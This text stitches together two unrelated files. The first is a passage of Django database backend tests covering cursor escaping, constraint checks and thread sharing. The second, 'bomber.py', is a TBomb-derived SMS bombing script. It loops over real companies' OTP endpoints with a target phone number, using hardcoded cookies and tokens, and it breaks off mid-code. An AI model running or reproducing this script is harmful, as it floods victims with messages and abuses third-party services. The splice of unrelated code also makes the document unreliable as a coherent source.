EscapingChecksDebug test case, to also test CursorDebugWrapper.
"""
bare_select_suffix = connection.features.bare_select_suffix
def test_paramless_no_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%s'" + self.bare_select_suffix)
self.assertEqual(cursor.fetchall()[0][0], '%s')
def test_parameter_escaping(self):
cursor = connection.cursor()
cursor.execute("SELECT '%%', %s" + self.bare_select_suffix, ('%d',))
self.assertEqual(cursor.fetchall()[0], ('%', '%d'))
@unittest.skipUnless(connection.vendor == 'sqlite',
"This is an sqlite-specific issue")
def test_sqlite_parameter_escaping(self):
#13648: '%s' escaping support for sqlite3
cursor = connection.cursor()
cursor.execute("select strftime('%s', date('now'))")
response = cursor.fetchall()[0][0]
        # response should be a non-zero integer
self.assertTrue(int(response))
@override_settings(DEBUG=True)
class EscapingChecksDebug(EscapingChecks):
pass
class BackendTestCase(TransactionTestCase):
available_apps = ['backends']
def create_squares_with_executemany(self, args):
self.create_squares(args, 'format', True)
def create_squares(self, args, paramstyle, multiple):
cursor = connection.cursor()
opts = models.Square._meta
tbl = connection.introspection.table_name_converter(opts.db_table)
f1 = connection.ops.quote_name(opts.get_field('root').column)
f2 = connection.ops.quote_name(opts.get_field('square').column)
if paramstyle == 'format':
query = 'INSERT INTO %s (%s, %s) VALUES (%%s, %%s)' % (tbl, f1, f2)
elif paramstyle == 'pyformat':
query = 'INSERT INTO %s (%s, %s) VALUES (%%(root)s, %%(square)s)' % (tbl, f1, f2)
else:
raise ValueError("unsupported paramstyle in test")
if multiple:
cursor.executemany(query, args)
else:
cursor.execute(query, args)
def test_cursor_executemany(self):
#4896: Test cursor.executemany
args = [(i, i ** 2) for i in range(-5, 6)]
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
def test_cursor_executemany_with_empty_params_list(self):
#4765: executemany with params=[] does nothing
args = []
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 0)
def test_cursor_executemany_with_iterator(self):
#10320: executemany accepts iterators
args = iter((i, i ** 2) for i in range(-3, 2))
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 5)
args = iter((i, i ** 2) for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares_with_executemany(args)
self.assertEqual(models.Square.objects.count(), 9)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_execute_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = {'root': 3, 'square': 9}
self.create_squares(args, 'pyformat', multiple=False)
self.assertEqual(models.Square.objects.count(), 1)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat(self):
#10070: Support pyformat style passing of parameters
args = [{'root': i, 'square': i ** 2} for i in range(-5, 6)]
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 11)
for i in range(-5, 6):
square = models.Square.objects.get(root=i)
self.assertEqual(square.square, i ** 2)
@skipUnlessDBFeature('supports_paramstyle_pyformat')
def test_cursor_executemany_with_pyformat_iterator(self):
args = iter({'root': i, 'square': i ** 2} for i in range(-3, 2))
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 5)
args = iter({'root': i, 'square': i ** 2} for i in range(3, 7))
with override_settings(DEBUG=True):
# same test for DebugCursorWrapper
self.create_squares(args, 'pyformat', multiple=True)
self.assertEqual(models.Square.objects.count(), 9)
def test_unicode_fetches(self):
#6254: fetchone, fetchmany, fetchall return strings as unicode objects
qn = connection.ops.quote_name
models.Person(first_name="John", last_name="Doe").save()
models.Person(first_name="Jane", last_name="Doe").save()
models.Person(first_name="Mary", last_name="Agnelline").save()
models.Person(first_name="Peter", last_name="Parker").save()
models.Person(first_name="Clark", last_name="Kent").save()
opts2 = models.Person._meta
f3, f4 = opts2.get_field('first_name'), opts2.get_field('last_name')
query2 = ('SELECT %s, %s FROM %s ORDER BY %s'
% (qn(f3.column), qn(f4.column), connection.introspection.table_name_converter(opts2.db_table),
qn(f3.column)))
cursor = connection.cursor()
cursor.execute(query2)
self.assertEqual(cursor.fetchone(), ('Clark', 'Kent'))
self.assertEqual(list(cursor.fetchmany(2)), [('Jane', 'Doe'), ('John', 'Doe')])
self.assertEqual(list(cursor.fetchall()), [('Mary', 'Agnelline'), ('Peter', 'Parker')])
def test_unicode_password(self):
old_password = connection.settings_dict['PASSWORD']
connection.settings_dict['PASSWORD'] = "françois"
try:
connection.cursor()
except DatabaseError:
# As password is probably wrong, a database exception is expected
pass
except Exception as e:
self.fail("Unexpected error raised with unicode password: %s" % e)
finally:
connection.settings_dict['PASSWORD'] = old_password
def test_database_operations_helper_class(self):
# Ticket #13630
self.assertTrue(hasattr(connection, 'ops'))
self.assertTrue(hasattr(connection.ops, 'connection'))
self.assertEqual(connection, connection.ops.connection)
def test_database_operations_init(self):
"""
Test that DatabaseOperations initialization doesn't query the database.
See #17656.
"""
with self.assertNumQueries(0):
connection.ops.__class__(connection)
def test_cached_db_features(self):
self.assertIn(connection.features.supports_transactions, (True, False))
self.assertIn(connection.features.supports_stddev, (True, False))
self.assertIn(connection.features.can_introspect_foreign_keys, (True, False))
def test_duplicate_table_error(self):
""" Test that creating an existing table returns a DatabaseError """
cursor = connection.cursor()
query = 'CREATE TABLE %s (id INTEGER);' % models.Article._meta.db_table
with self.assertRaises(DatabaseError):
cursor.execute(query)
def test_cursor_contextmanager(self):
"""
Test that cursors can be used as a context manager
"""
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
# Both InterfaceError and ProgrammingError seem to be used when
# accessing closed cursor (psycopg2 has InterfaceError, rest seem
# to use ProgrammingError).
with self.assertRaises(connection.features.closed_cursor_error_class):
# cursor should be closed, so no queries should be possible.
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
@unittest.skipUnless(connection.vendor == 'postgresql',
"Psycopg2 specific cursor.closed attribute needed")
def test_cursor_contextmanager_closing(self):
# There isn't a generic way to test that cursors are closed, but
# psycopg2 offers us a way to check that by closed attribute.
# So, run only on psycopg2 for that reason.
with connection.cursor() as cursor:
self.assertIsInstance(cursor, CursorWrapper)
self.assertTrue(cursor.closed)
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_is_usable_after_database_disconnects(self):
"""
Test that is_usable() doesn't crash when the database disconnects.
Regression for #21553.
"""
# Open a connection to the database.
with connection.cursor():
pass
# Emulate a connection close by the database.
connection._close()
# Even then is_usable() should not raise an exception.
try:
self.assertFalse(connection.is_usable())
finally:
# Clean up the mess created by connection._close(). Since the
# connection is already closed, this crashes on some backends.
try:
connection.close()
except Exception:
pass
@override_settings(DEBUG=True)
def test_queries(self):
"""
Test the documented API of connection.queries.
"""
with connection.cursor() as cursor:
reset_queries()
cursor.execute("SELECT 1" + connection.features.bare_select_suffix)
self.assertEqual(1, len(connection.queries))
self.assertIsInstance(connection.queries, list)
self.assertIsInstance(connection.queries[0], dict)
six.assertCountEqual(self, connection.queries[0].keys(), ['sql', 'time'])
reset_queries()
self.assertEqual(0, len(connection.queries))
# Unfortunately with sqlite3 the in-memory test database cannot be closed.
@skipUnlessDBFeature('test_db_allows_multiple_connections')
@override_settings(DEBUG=True)
def test_queries_limit(self):
"""
Test that the backend doesn't store an unlimited number of queries.
Regression for #12581.
"""
old_queries_limit = BaseDatabaseWrapper.queries_limit
BaseDatabaseWrapper.queries_limit = 3
new_connections = ConnectionHandler(settings.DATABASES)
new_connection = new_connections[DEFAULT_DB_ALIAS]
# Initialize the connection and clear initialization statements.
with new_connection.cursor():
pass
new_connection.queries_log.clear()
try:
with new_connection.cursor() as cursor:
cursor.execute("SELECT 1" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 2" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(2, len(new_connection.queries))
self.assertEqual(0, len(w))
with new_connection.cursor() as cursor:
cursor.execute("SELECT 3" + new_connection.features.bare_select_suffix)
cursor.execute("SELECT 4" + new_connection.features.bare_select_suffix)
with warnings.catch_warnings(record=True) as w:
self.assertEqual(3, len(new_connection.queries))
self.assertEqual(1, len(w))
self.assertEqual(str(w[0].message), "Limit for query logging "
"exceeded, only the last 3 queries will be returned.")
finally:
BaseDatabaseWrapper.queries_limit = old_queries_limit
new_connection.close()
# We don't make these tests conditional because that means we would need to
# check and differentiate between:
# * MySQL+InnoDB, MySQL+MYISAM (something we currently can't do).
# * if sqlite3 (if/once we get #14204 fixed) has referential integrity turned
# on or not, something that would be controlled by runtime support and user
# preference.
# The tests below verify that the raised exception is django.db.IntegrityError.
class FkConstraintsTests(TransactionTestCase):
available_apps = ['backends']
def setUp(self):
# Create a Reporter.
self.r = models.Reporter.objects.create(first_name='John', last_name='Smith')
def test_integrity_checks_on_creation(self):
"""
Try to create a model instance that violates a FK constraint. If it
fails it should fail with IntegrityError.
"""
a1 = models.Article(headline="This is a test", pub_date=datetime.datetime(2005, 7, 27), reporter_id=30)
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
a2 = models.Article(headline='This is another test', reporter=self.r,
pub_date=datetime.datetime(2012, 8, 3),
reporter_proxy_id=30)
self.assertRaises(IntegrityError, a2.save)
def test_integrity_checks_on_update(self):
"""
Try to update a model instance introducing a FK constraint violation.
If it fails it should fail with IntegrityError.
"""
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a1 = models.Article.objects.get(headline="Test article")
a1.reporter_id = 30
try:
a1.save()
except IntegrityError:
pass
else:
self.skipTest("This backend does not support integrity checks.")
# Now that we know this backend supports integrity checks we make sure
# constraints are also enforced for proxy models. Refs #17519
# Create another article
r_proxy = models.ReporterProxy.objects.get(pk=self.r.pk)
models.Article.objects.create(headline='Another article',
pub_date=datetime.datetime(1988, 5, 15),
reporter=self.r, reporter_proxy=r_proxy)
        # Retrieve the second article from the DB
a2 = models.Article.objects.get(headline='Another article')
a2.reporter_proxy_id = 30
self.assertRaises(IntegrityError, a2.save)
def test_disable_constraint_checks_manually(self):
"""
When constraint checks are disabled, should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
connection.disable_constraint_checking()
a.save()
connection.enable_constraint_checking()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_disable_constraint_checks_context_manager(self):
"""
When constraint checks are disabled (using context manager), should be able to write bad data without IntegrityErrors.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
try:
with connection.constraint_checks_disabled():
a.save()
except IntegrityError:
self.fail("IntegrityError should not have occurred.")
transaction.set_rollback(True)
def test_check_constraints(self):
"""
Constraint checks should raise an IntegrityError when bad data is in the DB.
"""
with transaction.atomic():
# Create an Article.
models.Article.objects.create(headline="Test article", pub_date=datetime.datetime(2010, 9, 4), reporter=self.r)
# Retrieve it from the DB
a = models.Article.objects.get(headline="Test article")
a.reporter_id = 30
with connection.constraint_checks_disabled():
a.save()
with self.assertRaises(IntegrityError):
connection.check_constraints()
transaction.set_rollback(True)
class ThreadTests(TransactionTestCase):
available_apps = ['backends']
def test_default_connection_thread_local(self):
"""
Ensure that the default connection (i.e. django.db.connection) is
different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
connection.cursor()
connections_dict[id(connection)] = connection
def runner():
# Passing django.db.connection between threads doesn't work while
# connections[DEFAULT_DB_ALIAS] does.
from django.db import connections
connection = connections[DEFAULT_DB_ALIAS]
# Allow thread sharing so the connection can be closed by the
# main thread.
connection.allow_thread_sharing = True
connection.cursor()
connections_dict[id(connection)] = connection
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
# Check that each created connection got different inner connection.
self.assertEqual(
len(set(conn.connection for conn in connections_dict.values())),
3)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_connections_thread_local(self):
"""
Ensure that the connections are different for each thread.
Refs #17258.
"""
# Map connections by id because connections with identical aliases
# have the same hash.
connections_dict = {}
for conn in connections.all():
connections_dict[id(conn)] = conn
def runner():
from django.db import connections
for conn in connections.all():
# Allow thread sharing so the connection can be closed by the
# main thread.
conn.allow_thread_sharing = True
connections_dict[id(conn)] = conn
for x in range(2):
t = threading.Thread(target=runner)
t.start()
t.join()
self.assertEqual(len(connections_dict), 6)
# Finish by closing the connections opened by the other threads (the
# connection opened in the main thread will automatically be closed on
# teardown).
for conn in connections_dict.values():
if conn is not connection:
conn.close()
def test_pass_connection_between_threads(self):
"""
Ensure that a connection can be passed from one thread to the other.
Refs #17258.
"""
models.Person.objects.create(first_name="John", last_name="Doe")
def do_thread():
def runner(main_thread_connection):
from django.db import connections
connections['default'] = main_thread_connection
try:
models.Person.objects.get(first_name="John", last_name="Doe")
except Exception as e:
exceptions.append(e)
t = threading.Thread(target=runner, args=[connections['default']])
t.start()
t.join()
# Without touching allow_thread_sharing, which should be False by default.
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to False
connections['default'].allow_thread_sharing = False
exceptions = []
do_thread()
# Forbidden!
self.assertIsInstance(exceptions[0], DatabaseError)
# If explicitly setting allow_thread_sharing to True
connections['default'].allow_thread_sharing = True
exceptions = []
do_thread()
# All good
self.assertEqual(exceptions, [])
def test_closing_non_shared_connections(self):
"""
Ensure that a connection that is not explicitly shareable cannot be
closed by another thread.
Refs #17258.
"""
# First, without explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# The exception was raised
self.assertEqual(len(exceptions), 1)
# Then, with explicitly enabling the connection for sharing.
exceptions = set()
def runner1():
def runner2(other_thread_connection):
try:
other_thread_connection.close()
except DatabaseError as e:
exceptions.add(e)
# Enable thread sharing
connections['default'].allow_thread_sharing = True
t2 = threading.Thread(target=runner2, args=[connections['default']])
t2.start()
t2.join()
t1 = threading.Thread(target=runner1)
t1.start()
t1.join()
# No exception was raised
self.assertEqual(len(exceptions), 0)
class MySQLPKZeroTests(TestCase):
"""
Zero as id for AutoField should raise exception in MySQL, because MySQL
does not allow zero for autoincrement primary key.
"""
@skipIfDBFeature('allows_auto_pk_0')
def test_zero_as_autoval(self):
with self.assertRaises(ValueError):
models.Square.objects.create(id=0, root=0, square=1)
class DBConstraintTestCase(TestCase):
def test_can_reference_existent(self):
obj = models.Object.objects.create()
ref = models.ObjectReference.objects.create(obj=obj)
self.assertEqual(ref.obj, obj)
ref = models.ObjectReference.objects.get(obj=obj)
self.assertEqual(ref.obj, obj)
def test_can_reference_non_existent(self):
self.assertFalse(models.Object.objects.filter(id=12345).exists())
ref = models.ObjectReference.objects.create(obj_id=12345)
ref_new = models.ObjectReference.objects.get(obj_id=12345)
self.assertEqual(ref, ref_new)
with self.assertRaises(models.Object.DoesNotExist):
ref.obj
def test_many_to_many(self):
obj = models.Object.objects.create()
obj.related_objects.create()
self.assertEqual(models.Object.objects.count(), 2)
self.assertEqual(obj.related_objects.count(), 1)
intermediary_model = models.Object._meta.get_field("related_objects").rel.through
intermediary_model.objects.create(from_object_id=obj.id, to_object_id=12345)
self.assertEqual(obj.related_objects.count(), 1)
self.assertEqual(intermediary_model.objects.count(), 2)
class BackendUtilTests(TestCase):
def test_format_number(self):
"""
Test the format_number converter utility
"""
def equal(value, max_d, places, result):
self.assertEqual(format_number(Decimal(value), max_d, places), result)
equal('0', 12, 3,
'0.000')
equal('0', 12, 8,
'0.00000000')
equal('1', 12, 9,
'1.000000000')
equal('0.00000000', 12, 8,
'0.00000000')
equal('0.000000004', 12, 8,
'0.00000000')
equal('0.000000008', 12, 8,
'0.00000001')
equal('0.000000000000000000999', 10, 8,
'0.00000000')
equal('0.1234567890', 12, 10,
'0.1234567890')
equal('0.1234567890', 12, 9,
'0.123456789')
equal('0.1234567890', 12, 8,
'0.12345679')
equal('0.1234567890', 12, 5,
'0.12346')
equal('0.1234567890', 12, 3,
'0.123')
equal('0.1234567890', 12, 1,
'0.1')
equal('0.1234567890', 12, 0,
'0')
equal('0.1234567890', None, 0,
'0')
equal('1234567890.1234567890', None, 0,
'1234567890')
equal('1234567890.1234567890', None, 2,
'1234567890.12')
equal('0.1234', 5, None,
'0.1234')
equal('123.12', 5, None,
'123.12')
with self.assertRaises(Rounded):
equal('0.1234567890', 5, None,
'0.12346')
with self.assertRaises(Rounded):
equal('1234567890.1234', 5, None,
'1234600000')
@ignore_warnings(category=UserWarning,
message="Overriding setting DATABASES can lead to unexpected behavior")
class DBTestSettingsRenamedTests(TestCase):
mismatch_msg = ("Connection 'test-deprecation' has mismatched TEST "
"and TEST_* database settings.")
def setUp(self):
super(DBTestSettingsRenamedTests, self).setUp()
self.handler = ConnectionHandler()
self.db_settings = {'default': {}}
def test_mismatched_database_test_settings_1(self):
# if the TEST setting is used, all TEST_* keys must appear in it.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_NAME': 'foo',
}
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_2(self):
# if the TEST setting is used, all TEST_* keys must match.
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_3(self):
# Verifies the mapping of an aliased key.
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': 'foo'},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_database_test_settings_4(self):
# Verifies the mapping of an aliased key when the aliased key is missing.
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': 'bar',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_old_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {'CREATE_DB': None},
'TEST_CREATE': '',
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_mismatched_settings_new_none(self):
self.db_settings.update({
'test-deprecation': {
'TEST': {},
'TEST_CREATE': None,
},
})
with override_settings(DATABASES=self.db_settings):
with self.assertRaisesMessage(ImproperlyConfigured, self.mismatch_msg):
self.handler.prepare_test_settings('test-deprecation')
def test_matched_test_settings(self):
# should be able to define new settings and the old, if they match
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_new_settings_only(self):
# should be able to define new settings without the old
self.db_settings.update({
'test-deprecation': {
'TEST': {'NAME': 'foo'},
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
@ignore_warnings(category=RemovedInDjango19Warning)
def test_old_settings_only(self):
# should be able to define old settings without the new
self.db_settings.update({
'test-deprecation': {
'TEST_NAME': 'foo',
},
})
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('test-deprecation')
def test_empty_settings(self):
with override_settings(DATABASES=self.db_settings):
self.handler.prepare_test_settings('default')
@unittest.skipUnless(connection.vendor == 'sqlite', 'SQLite specific test.')
@skipUnlessDBFeature('can_share_in_memory_db')
class TestSqliteThreadSharing(TransactionTestCase):
available_apps = ['backends']
def test_database_sharing_in_threads(self):
def create_object():
models.Object.objects.create()
create_object()
thread = threading.Thread(target=create_object)
thread.start()
thread.join()
self.assertEqual(models.Object.objects.count(), 2)
|
bomber.py
|
#!/usr/bin/env python
from datetime import datetime
import os
import hashlib
import sys
import time
import threading
import string
import random
import base64
import urllib.request
import urllib.parse
import urllib.error
try:
import requests
except ImportError:
print('[!] Error: some dependencies are not installed')
print('Type \'pip install -r requirements.txt\' to install all required packages')
exit()
colors=['\033[1;31m','\033[1;32m','\033[1;33m','\033[1;34m','\033[1;35m','\033[1;36m']
W='\033[0m'
# The Credit For This Code Goes To SpeedX And All Other Contributors Listed At https://github.com/TheSpeedX/TBomb
# If You Wanna Take Credits For This Code, Please Look Yourself Again
country_codes = {
'93': 'AF',
'355': 'AL',
'213': 'DZ',
'376': 'AD',
'244': 'AO',
'672': 'AQ',
'54': 'AR',
'374': 'AM',
'297': 'AW',
'61': 'AU',
'43': 'AT',
'994': 'AZ',
'973': 'BH',
'880': 'BD',
'375': 'BY',
'32': 'BE',
'501': 'BZ',
'229': 'BJ',
'975': 'BT',
'591': 'BO',
'387': 'BA',
'267': 'BW',
'55': 'BR',
'246': 'IO',
'673': 'BN',
'359': 'BG',
'226': 'BF',
'257': 'BI',
'855': 'KH',
'237': 'CM',
'238': 'CV',
'236': 'CF',
'235': 'TD',
'56': 'CL',
'86': 'CN',
'57': 'CO',
'269': 'KM',
'682': 'CK',
'506': 'CR',
'385': 'HR',
'53': 'CU',
'599': 'AN',
'357': 'CY',
'420': 'CZ',
'243': 'CD',
'45': 'DK',
'253': 'DJ',
'670': 'TL',
'593': 'EC',
'20': 'EG',
'503': 'SV',
'240': 'GQ',
'291': 'ER',
'372': 'EE',
'251': 'ET',
'500': 'FK',
'298': 'FO',
'679': 'FJ',
'358': 'FI',
'33': 'FR',
'689': 'PF',
'241': 'GA',
'220': 'GM',
'995': 'GE',
'49': 'DE',
'233': 'GH',
'350': 'GI',
'30': 'GR',
'299': 'GL',
'502': 'GT',
'224': 'GN',
'245': 'GW',
'592': 'GY',
'509': 'HT',
'504': 'HN',
'852': 'HK',
'36': 'HU',
'354': 'IS',
'91': 'IN',
'62': 'ID',
'98': 'IR',
'964': 'IQ',
'353': 'IE',
'972': 'IL',
'39': 'IT',
'225': 'CI',
'81': 'JP',
'962': 'JO',
'254': 'KE',
'686': 'KI',
'383': 'XK',
'965': 'KW',
'996': 'KG',
'856': 'LA',
'371': 'LV',
'961': 'LB',
'266': 'LS',
'231': 'LR',
'218': 'LY',
'423': 'LI',
'370': 'LT',
'352': 'LU',
'853': 'MO',
'389': 'MK',
'261': 'MG',
'265': 'MW',
'60': 'MY',
'960': 'MV',
'223': 'ML',
'356': 'MT',
'692': 'MH',
'222': 'MR',
'230': 'MU',
'262': 'RE',
'52': 'MX',
'691': 'FM',
'373': 'MD',
'377': 'MC',
'976': 'MN',
'382': 'ME',
'212': 'EH',
'258': 'MZ',
'95': 'MM',
'264': 'NA',
'674': 'NR',
'977': 'NP',
'31': 'NL',
'687': 'NC',
'64': 'NZ',
'505': 'NI',
'227': 'NE',
'234': 'NG',
'683': 'NU',
'850': 'KP',
'47': 'SJ',
'968': 'OM',
'92': 'PK',
'680': 'PW',
'970': 'PS',
'507': 'PA',
'675': 'PG',
'595': 'PY',
'51': 'PE',
'63': 'PH',
'48': 'PL',
'351': 'PT',
'974': 'QA',
'242': 'CG',
'40': 'RO',
'7': 'RU',
'250': 'RW',
'590': 'MF',
'290': 'SH',
'508': 'PM',
'685': 'WS',
'378': 'SM',
'239': 'ST',
'966': 'SA',
'221': 'SN',
'381': 'RS',
'248': 'SC',
'232': 'SL',
'65': 'SG',
'421': 'SK',
'386': 'SI',
'677': 'SB',
'252': 'SO',
'27': 'ZA',
'82': 'KR',
'211': 'SS',
'34': 'ES',
'94': 'LK',
'249': 'SD',
'597': 'SR',
'268': 'SZ',
'46': 'SE',
'41': 'CH',
'963': 'SY',
'886': 'TW',
'992': 'TJ',
'255': 'TZ',
'66': 'TH',
'228': 'TG',
'690': 'TK',
'676': 'TO',
'216': 'TN',
'90': 'TR',
'993': 'TM',
'688': 'TV',
'256': 'UG',
'380': 'UA',
'971': 'AE',
'44': 'GB',
'1': 'US',
'598': 'UY',
'998': 'UZ',
'678': 'VU',
'379': 'VA',
'58': 'VE',
'84': 'VN',
'681': 'WF',
'967': 'YE',
'260': 'ZM',
'263': 'ZW'
}
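# Hypothetical helper (not part of the original script): resolve the ISO
# country code for a full number such as "919876543210" by longest-prefix
# match against the dictionary above.
def guess_country(full_number):
    for prefix in sorted(country_codes, key=len, reverse=True):
        if str(full_number).startswith(prefix):
            return country_codes[prefix]
    return None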
def clr():
if os.name == 'nt':
os.system('cls')
else:
os.system('clear')
def banner():
clr()
logo="""
████████ ██████ ██
▒▒▒██▒▒▒ ██▒▒▒██ ██
██ ██ ██ ████ ██ ██ ██
██ ██████▒ ██▒▒██ ███ ███ █████
██ ██▒▒▒██ ██ ██ ██▒█▒██ ██▒▒██
██ ██ ██ ██ ██ ██ ▒ ██ ██ ██
██ ██████▒ ▒████▒ ██ ██ █████▒
▒▒ ▒▒▒▒▒▒ ▒▒▒▒ ▒▒ ▒▒ ▒▒▒▒▒
"""
print(random.choice(colors)+logo+W)
print("\n")
count_inf = 0
def infinite(pn, dl, ch, maxlim):
global count_inf
while True:
while os.path.exists('proc.xxx'):
time.sleep(0.5)
os.system('touch proc.xxx')
api = random.choice(ch)
try:
ret = getapi(pn, api, 91)
except Exception:
ret = False
if not ret:
while ch.count(api) > 0:
ch.remove(api)
continue
os.system('rm proc.xxx >/dev/null 2>&1')
count_inf += 1
# os.system('echo SpeedX >> count.xxx')
time.sleep(float(dl))
if (count_inf > maxlim):
exit()
def checkinternet():
res = False
try:
# requests.get('https://www.google.com', verify=True)
requests.get('https://www.google.com')
res = False
except Exception:
res = True
if res:
print("\n\n\tIt seems That Your Internet Speed is Slow or You Are Using Proxies...")
print('\t\tTBomb Will Stop Now...\n\n')
banner()
exit()
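# Hedged variant of the connectivity check above: an explicit timeout keeps a
# dead network from hanging the script, and the result is returned instead of
# calling exit() so callers can decide what to do.
def has_internet(timeout=5):
    try:
        requests.get('https://www.google.com', timeout=timeout)
        return True
    except requests.RequestException:
        return False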
def getapi(pn,lim,cc):
cc=str(cc)
pn=str(pn)
lim = int(lim)
url = ["https://www.oyorooms.com/api/pwa/generateotp?country_code=%2B" +
str(cc) + "&nod=4&phone=" + pn, "https://direct.delhivery.com/delhiverydirect/order/generate-otp?phoneNo=" + pn, "https://securedapi.confirmtkt.com/api/platform/register?mobileNumber=" + pn]
try:
if lim < len(url):
urllib.request.urlopen(str(url[lim]))
return True
except (urllib.error.HTTPError, urllib.error.URLError):
return False
if lim == 3:
headers = {
'Host': 'pharmeasy.in',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0',
'Accept': '*/*',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate, br',
'Referer': 'https://pharmeasy.in/',
'Content-Type': 'application/json',
'Content-Length': '30',
'Connection': 'keep-alive',
}
data = {"contactNumber":pn}
response = requests.post('https://pharmeasy.in/api/auth/requestOTP', headers=headers, json=data)
return response.status_code==200
elif lim == 4:
cookies = {
'_ga': 'GA1.2.1273460610.1561191565',
'_gid': 'GA1.2.172574299.1561191565',
'_gcl_au': '1.1.833556660.1561191566',
'_fbp': 'fb.1.1561191568709.1707722126',
'PHPSESSID': 'm5tap7nr75b2ehcn8ur261oq86',
}
headers={
'Host': 'www.heromotocorp.com',
'Connection': 'keep-alive',
'Content-Length': '126',
'Accept': '*/*',
'Origin': 'https://www.heromotocorp.com',
'X-Requested-With': 'XMLHttpRequest',
'Save-Data': 'on',
'User-Agent': 'Mozilla/5.0 (Linux; Android 8.1.0; vivo 1718) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Referer': 'https://www.heromotocorp.com/en-in/xpulse200/',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-IN,en;q=0.9,en-GB;q=0.8,en-US;q=0.7,hi;q=0.6',
}
data = {
'mobile_no': pn,
'randome': 'ZZUC9WCCP3ltsd/JoqFe5HHe6WfNZfdQxqi9OZWvKis=',
'mobile_no_otp': '',
'csrf': '523bc3fa1857c4df95e4d24bbd36c61b'
}
response = requests.post('https://www.heromotocorp.com/en-in/xpulse200/ajax_data.php', headers=headers, cookies=cookies, data=data)
return response.status_code==200
elif lim == 5:
cookies = {
'Cookie:_ga': 'GA1.2.1483885314.1559157646',
'_fbp': 'fb.1.1559157647161.1989205138',
'TiPMix': '91.9909185226964',
'gcb_t_track': 'SEO - Google',
'gcb_t_keyword': '',
'gcb_t_l_url': 'https://www.google.com/',
'gcb_utm_medium': '',
'gcb_utm_campaign': '',
'ASP.NET_SessionId': 'ioqkek5lbgvldlq4i3cmijcs',
'web_app_landing_utm_source': '',
